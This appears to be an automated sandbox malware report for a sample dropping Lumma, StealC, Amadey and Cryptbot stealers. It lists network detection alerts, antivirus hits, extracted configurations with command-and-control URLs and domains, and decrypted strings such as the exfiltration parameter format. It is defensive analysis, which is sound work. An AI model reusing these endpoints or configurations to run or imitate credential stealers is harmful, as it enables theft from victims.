2024-12-16T11:04:16.836716+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49994	104.21.50.161	443	TCP
2024-12-16T11:04:23.412435+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50007	104.21.50.161	443	TCP
2024-12-16T11:04:27.718646+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50041	104.21.50.161	443	TCP
2024-12-16T11:04:42.082900+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50099	104.21.50.161	443	TCP
2024-12-16T11:04:51.520861+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50109	104.21.50.161	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:56.058539+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49901	104.21.50.161	443	TCP
2024-12-16T11:04:10.168214+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49953	104.21.50.161	443	TCP
2024-12-16T11:04:16.836716+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49994	104.21.50.161	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:58.759759+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49913	104.21.50.161	443	TCP
2024-12-16T11:04:13.372905+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49979	104.21.50.161	443	TCP
2024-12-16T11:04:23.412435+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50007	104.21.50.161	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:53.642960+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49901	104.21.50.161	443	TCP
2024-12-16T11:03:57.289012+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49913	104.21.50.161	443	TCP
2024-12-16T11:04:00.456624+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49924	104.21.50.161	443	TCP
2024-12-16T11:04:06.532187+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49949	104.21.50.161	443	TCP
2024-12-16T11:04:07.751334+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49953	104.21.50.161	443	TCP
2024-12-16T11:04:10.310751+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49970	104.21.50.161	443	TCP
2024-12-16T11:04:11.879001+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49979	104.21.50.161	443	TCP
2024-12-16T11:04:15.683047+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49994	104.21.50.161	443	TCP
2024-12-16T11:04:16.233064+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49996	104.21.50.161	443	TCP
2024-12-16T11:04:16.394074+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	49998	104.21.50.161	443	TCP
2024-12-16T11:04:18.108295+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50007	104.21.50.161	443	TCP
2024-12-16T11:04:18.968897+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50012	104.21.50.161	443	TCP
2024-12-16T11:04:20.176805+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50015	104.21.50.161	443	TCP
2024-12-16T11:04:25.076209+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50032	104.21.50.161	443	TCP
2024-12-16T11:04:26.907501+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50041	104.21.50.161	443	TCP
2024-12-16T11:04:30.222163+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50063	104.21.50.161	443	TCP
2024-12-16T11:04:30.640991+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50066	104.21.50.161	443	TCP
2024-12-16T11:04:35.694293+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50091	104.21.50.161	443	TCP
2024-12-16T11:04:36.012939+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50092	104.21.50.161	443	TCP
2024-12-16T11:04:40.649447+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50098	104.21.50.161	443	TCP
2024-12-16T11:04:41.070552+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50099	104.21.50.161	443	TCP
2024-12-16T11:04:43.389374+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50101	104.21.50.161	443	TCP
2024-12-16T11:04:45.922737+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50105	104.21.50.161	443	TCP
2024-12-16T11:04:50.404359+0100	2058231	1	Domain Observed Used for C2 Detected	192.168.2.5	50109	104.21.50.161	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:04:29.192516+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50052	185.215.113.16	80	TCP
2024-12-16T11:04:43.561869+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50102	185.215.113.16	80	TCP
2024-12-16T11:04:53.132309+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50112	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:14.833169+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49796	185.215.113.43	80	TCP
2024-12-16T11:03:27.021042+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49827	185.215.113.43	80	TCP
2024-12-16T11:03:39.474880+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49861	185.215.113.43	80	TCP
2024-12-16T11:03:45.657486+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49878	185.215.113.43	80	TCP
2024-12-16T11:03:54.167212+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49902	185.215.113.43	80	TCP
2024-12-16T11:04:09.392019+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49960	185.215.113.43	80	TCP
2024-12-16T11:04:16.851410+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49999	185.215.113.43	80	TCP
2024-12-16T11:04:27.033554+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50040	185.215.113.43	80	TCP
2024-12-16T11:09:30.736397+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50319	185.215.113.43	80	TCP
2024-12-16T11:09:48.051581+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50326	185.215.113.43	80	TCP
2024-12-16T11:11:23.485779+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50381	185.215.113.43	80	TCP

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:04:00.376264+0100	2054350	1	A Network Trojan was detected	192.168.2.5	49922	141.8.192.141	80	TCP
2024-12-16T11:04:02.194521+0100	2054350	1	A Network Trojan was detected	192.168.2.5	49931	141.8.192.141	80	TCP
2024-12-16T11:04:44.292319+0100	2054350	1	A Network Trojan was detected	192.168.2.5	50103	141.8.192.141	80	TCP
2024-12-16T11:10:17.588305+0100	2054350	1	A Network Trojan was detected	192.168.2.5	50338	194.87.47.99	80	TCP
2024-12-16T11:10:19.223013+0100	2054350	1	A Network Trojan was detected	192.168.2.5	50340	194.87.47.99	80	TCP
2024-12-16T11:10:28.555387+0100	2054350	1	A Network Trojan was detected	192.168.2.5	50357	194.87.47.99	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:17.686821+0100	2057973	1	Domain Observed Used for C2 Detected	192.168.2.5	60470	1.1.1.1	53	UDP
2024-12-16T11:11:23.685398+0100	2057973	1	Domain Observed Used for C2 Detected	192.168.2.5	51992	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:17.909685+0100	2057975	1	Domain Observed Used for C2 Detected	192.168.2.5	50135	1.1.1.1	53	UDP
2024-12-16T11:11:23.825631+0100	2057975	1	Domain Observed Used for C2 Detected	192.168.2.5	56740	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:16.665182+0100	2057979	1	Domain Observed Used for C2 Detected	192.168.2.5	51658	1.1.1.1	53	UDP
2024-12-16T11:11:23.405356+0100	2057979	1	Domain Observed Used for C2 Detected	192.168.2.5	53347	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:16.893085+0100	2057977	1	Domain Observed Used for C2 Detected	192.168.2.5	61631	1.1.1.1	53	UDP
2024-12-16T11:11:23.545684+0100	2057977	1	Domain Observed Used for C2 Detected	192.168.2.5	52473	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:18.421681+0100	2057969	1	Domain Observed Used for C2 Detected	192.168.2.5	64130	1.1.1.1	53	UDP
2024-12-16T11:11:24.105386+0100	2057969	1	Domain Observed Used for C2 Detected	192.168.2.5	51190	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:18.204353+0100	2057971	1	Domain Observed Used for C2 Detected	192.168.2.5	61035	1.1.1.1	53	UDP
2024-12-16T11:11:23.964951+0100	2057971	1	Domain Observed Used for C2 Detected	192.168.2.5	59627	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:16.139307+0100	2057983	1	Domain Observed Used for C2 Detected	192.168.2.5	58075	1.1.1.1	53	UDP
2024-12-16T11:11:23.124759+0100	2057983	1	Domain Observed Used for C2 Detected	192.168.2.5	54286	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:52.180319+0100	2058230	1	Domain Observed Used for C2 Detected	192.168.2.5	53978	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:16.367670+0100	2057981	1	Domain Observed Used for C2 Detected	192.168.2.5	63000	1.1.1.1	53	UDP
2024-12-16T11:11:23.264300+0100	2057981	1	Domain Observed Used for C2 Detected	192.168.2.5	63149	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:56.604030+0100	2044247	1	Malware Command and Control Activity Detected	116.203.12.114	443	192.168.2.5	49908	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:58.928033+0100	2051831	1	Malware Command and Control Activity Detected	116.203.12.114	443	192.168.2.5	49916	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:56.603479+0100	2049087	1	A Network Trojan was detected	192.168.2.5	49908	116.203.12.114	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:04:08.152881+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49949	104.21.50.161	443	TCP
2024-12-16T11:04:45.931575+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50105	104.21.50.161	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:04:11.637270+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49976	185.215.113.206	80	TCP
2024-12-16T11:04:30.895394+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50062	185.215.113.206	80	TCP
2024-12-16T11:04:47.524230+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50106	185.215.113.206	80	TCP
2024-12-16T11:04:54.177028+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50113	185.215.113.206	80	TCP
2024-12-16T11:05:00.952137+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50146	185.215.113.206	80	TCP
2024-12-16T11:05:04.418862+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50152	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:04:32.475287+0100	2856121	1	A Network Trojan was detected	192.168.2.5	50068	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:05.156124+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49772	185.215.113.43	80	TCP
2024-12-16T11:08:09.347290+0100	2856147	1	A Network Trojan was detected	192.168.2.5	50290	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:13.479476+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	49779	TCP
2024-12-16T11:09:29.389321+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50317	TCP
2024-12-16T11:09:46.717098+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50323	TCP
2024-12-16T11:11:22.132970+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50379	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:09.622524+0100	2803305	3	Unknown Traffic	192.168.2.5	49783	31.41.244.11	80	TCP
2024-12-16T11:03:16.278589+0100	2803305	3	Unknown Traffic	192.168.2.5	49800	31.41.244.11	80	TCP
2024-12-16T11:03:28.470129+0100	2803305	3	Unknown Traffic	192.168.2.5	49833	31.41.244.11	80	TCP
2024-12-16T11:03:40.925782+0100	2803305	3	Unknown Traffic	192.168.2.5	49864	31.41.244.11	80	TCP
2024-12-16T11:03:47.123628+0100	2803305	3	Unknown Traffic	192.168.2.5	49881	185.215.113.16	80	TCP
2024-12-16T11:03:55.736682+0100	2803305	3	Unknown Traffic	192.168.2.5	49906	185.215.113.16	80	TCP
2024-12-16T11:04:10.864368+0100	2803305	3	Unknown Traffic	192.168.2.5	49974	185.215.113.16	80	TCP
2024-12-16T11:04:18.325264+0100	2803305	3	Unknown Traffic	192.168.2.5	50005	185.215.113.16	80	TCP
2024-12-16T11:04:28.539689+0100	2803305	3	Unknown Traffic	192.168.2.5	50048	31.41.244.11	80	TCP
2024-12-16T11:09:19.996712+0100	2803305	3	Unknown Traffic	192.168.2.5	50318	31.41.244.11	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:04:20.189604+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50015	104.21.50.161	443	TCP
2024-12-16T11:04:35.700095+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50091	104.21.50.161	443	TCP
2024-12-16T11:04:45.931575+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50105	104.21.50.161	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T11:03:21.489594+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49811	23.37.186.133	443	TCP
2024-12-16T11:11:26.637547+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	50382	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Avira: detection malicious, Label: HEUR/AGEN.1306956
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306956
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000000.00000003.2064441142.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000022.00000002.3390011704.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 00000007.00000002.2629200355.0000000002F80000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["drive-connect.cyou", "formy-spill.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "se-blurry.biz", "dare-curbys.biz", "print-vexer.biz", "impend-differ.biz", "covery-mover.biz"], "Build id": "FATE99--test"}
Source: 4b8eda303b.exe.4476.12.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["home.twentygr20sb.top"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: impend-differ.biz
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: print-vexer.biz
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: dare-curbys.biz
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: covery-mover.biz
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: formy-spill.biz
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: dwell-exclaim.biz
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: zinc-sneark.biz
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: se-blurry.biz
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: drive-connect.cyou
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 11.2.d1834e5726.exe.400000.0.unpack	String decryptor: FATE99--test

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 9_2_004E13F0 CoResumeClassObjects,CryptContextAddRef,GetLastError,

9_2_004E13F0

Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_fb1b3170-b

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 23.37.186.133:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.5:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49913 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50232 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Directory queried: number of queries: 3003

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004ED871 FindFirstFileExW,	7_2_004ED871
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004ED922 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_004ED922
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004ED871 FindFirstFileExW,	9_2_004ED871
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004ED922 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_004ED922

